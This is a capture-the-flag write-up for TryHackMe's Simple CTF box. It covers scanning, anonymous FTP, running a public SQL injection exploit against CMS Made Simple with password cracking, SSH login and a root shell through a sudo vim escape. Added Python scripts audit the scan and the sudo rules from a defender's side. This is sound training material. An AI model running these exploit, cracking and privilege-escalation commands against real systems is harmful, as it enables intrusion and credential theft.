TryHackMe Simple CTF Writeup

This writeup will help you solve the Simple CTF box on TryHackMe. Before we start enumerating the box, add the following line to your /etc/hosts file, replacing <box_ip> with the IP address of your target (the file is root-owned, so the write goes through sudo):

echo "<box_ip>   simple.thm" | sudo tee -a /etc/hosts

TryHackMe Simple CTF – Enumeration

As usual, we start by running a port scan against the host with nmap. The -sC flag runs nmap's default NSE script set against the open ports, and the -sV flag probes each port for service and version information.

nmap -sV -sC simple.thm

You can see the output of this scan below:

PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.8.169
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 2 disallowed entries 
|_/ /openemr-5_0_1_3 
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY=
|   256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

There are three open ports: 21 (FTP), 80 (HTTP) and 2222 (SSH). Since the scan shows that anonymous login is allowed, we start with the FTP server.
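As an added example (not part of the original writeup), the following Python script parses nmap's normal output, the format quoted above, and reports the two findings from this scan that a defender would want to fix first: anonymous FTP login and the paths disclosed through robots.txt. The sample input is constructed from the scan above.

```python
import re

# Constructed sample: the relevant lines of the nmap -sV -sC output shown above.
SAMPLE_SCAN = """\
PORT     STATE SERVICE REASON         VERSION
21/tcp   open  ftp     syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
2222/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# The REASON column only appears with --reason / -v; strip it if present.
REASON = re.compile(r"^(?:syn-ack|conn-refused|no-response|reset)(?: ttl \d+)?\s*")

def parse_nmap(text):
    """Parse nmap 'normal' output into port records, each with its NSE script lines."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, rest = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": REASON.sub("", rest).strip(),
                          "scripts": []})
        elif line.startswith("|") and ports:
            # Lines starting with "| " or "|_" are NSE output for the most recent port.
            ports[-1]["scripts"].append(line[2:].strip())
    return ports

def audit(ports):
    """Return human-readable findings for the misconfigurations this scan exposes."""
    findings = []
    for p in ports:
        scripts = p["scripts"]
        if any("Anonymous FTP login allowed" in s for s in scripts):
            findings.append(f"{p['port']}/{p['proto']}: anonymous FTP login enabled")
        for i, s in enumerate(scripts):
            # The Disallow entries follow the http-robots.txt summary line.
            if s.startswith("http-robots.txt:") and i + 1 < len(scripts):
                findings.append(f"{p['port']}/{p['proto']}: robots.txt discloses {scripts[i + 1].split()}")
    return findings

if __name__ == "__main__":
    for finding in audit(parse_nmap(SAMPLE_SCAN)):
        print(finding)
```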

FTP server

Use the following command to log into the FTP server.

ftp simple.thm

Log in with the username anonymous and you should be in right after. The pub directory contains a file named ForMitch.txt, which you can download with the following commands:

cd pub
mget ForMitch.txt

Close the FTP connection and read the file you just downloaded. The message reads as follows:

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Keep this message in mind and move on to enumerating the web server.

TryHackMe Simple CTF – Web server

When we browse to http://simple.thm/ in our browser, we can see the following page:

TryHackMe Simple CTF - web server

The page is the default Apache welcome page. We can use gobuster to find hidden files and directories. Run the following command:

gobuster dir -u http://simple.thm/ -w /usr/share/wordlists/common.txt

The outcome is listed below.

/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/simple (Status: 301)

The most promising result is the /simple directory. Browse to http://simple.thm/simple/ to find the following page.

TryHackMe Simple CTF - simplecms

We have found the default page of a CMS called CMS Made Simple. At the bottom of the page, we learn that we are dealing with CMS Made Simple version 2.2.8. This version is vulnerable to SQL injection. You can find the exploit here. The script uses the injection to extract the admin user's details and password hash, and with -c and -w it also cracks the hash against a wordlist. Run the following commands to perform the exploit:

wget https://www.exploit-db.com/exploits/46635 -O 46635.py
python 46635.py -u http://simple.thm/simple/ -c -w /usr/share/wordlists/rockyou.txt

Wait a few minutes for the exploit to complete. In the end, you should see the following output:

[+] Salt for password found: REDACTED
[+] Username found: mitch
[+] Email found: [email protected]
[+] Password found: REDACTED
[+] Password cracked: REDACTED

This gives us a username and a cracked password. Recall the FTP note: the same weak password was set for the system user, so we try these credentials over SSH on port 2222:

ssh -p 2222 mitch@simple.thm

Enter the cracked password and we have a shell on the server. The user.txt flag resides in the /home/mitch/ directory.

TryHackMe Simple CTF – Root Flag

To work towards the root.txt flag, we first run sudo -l, which lists the commands the current user is allowed to run as other users. The output is listed below.

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

mitch can run vim as the root user without a password. Browse to this website to find out how vim can be used to spawn a shell. The following command does exactly that and drops us into a root shell.

sudo vim -c ':!/bin/bash'

The root.txt flag resides in the /root directory.
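The privilege escalation above works because vim was allowed with NOPASSWD, and vim can run arbitrary commands. As an added example (not part of the original writeup), here is a small Python audit that parses the sudo -l output quoted above and flags entries that effectively hand the run-as user a shell. The set of shell-escape binaries is an illustrative, non-exhaustive assumption; the suggested fix, granting sudoedit on specific files rather than the editor binary, is standard sudo functionality.

```python
import re

# Constructed sample: the sudo -l output quoted above.
SUDO_L_OUTPUT = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
"""

# Illustrative, not exhaustive: binaries that can hand the caller an interactive
# shell or write arbitrary files when run under sudo.
SHELL_ESCAPE_BINS = {"vim", "vi", "nano", "less", "more", "bash", "sh",
                     "python", "python3", "perl"}

# One sudo -l command line: "(runas) [TAG: ...] cmd1, cmd2".
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Parse the command lines of `sudo -l` into (runas, tags, [commands]) tuples."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header lines such as "User mitch may run ..."
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        entries.append((m.group("runas"), tags, cmds))
    return entries

def audit_sudo(entries):
    """Flag entries that effectively grant a shell as the run-as user."""
    findings = []
    for runas, tags, cmds in entries:
        for cmd in cmds:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                why = "unrestricted command set"
            elif binary in SHELL_ESCAPE_BINS:
                why = (f"{binary} can spawn a shell or write any file; "
                       "grant sudoedit on the specific files instead")
            else:
                continue
            pw = "NOPASSWD" if "NOPASSWD" in tags else "password required"
            findings.append(f"{cmd} as {runas} ({pw}): {why}")
    return findings

if __name__ == "__main__":
    for finding in audit_sudo(parse_sudo_l(SUDO_L_OUTPUT)):
        print(finding)
```

A safer sudoers line for the same need would be `mitch ALL=(root) NOPASSWD: sudoedit /path/to/config`, which edits the named file as root while running the editor itself as mitch.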

The Simple CTF box on TryHackMe was fun to root! This box is designed for beginners to get familiar with some basic principles of cybersecurity: anonymous FTP, weak and reused passwords, an outdated CMS, and an overly permissive sudo rule.
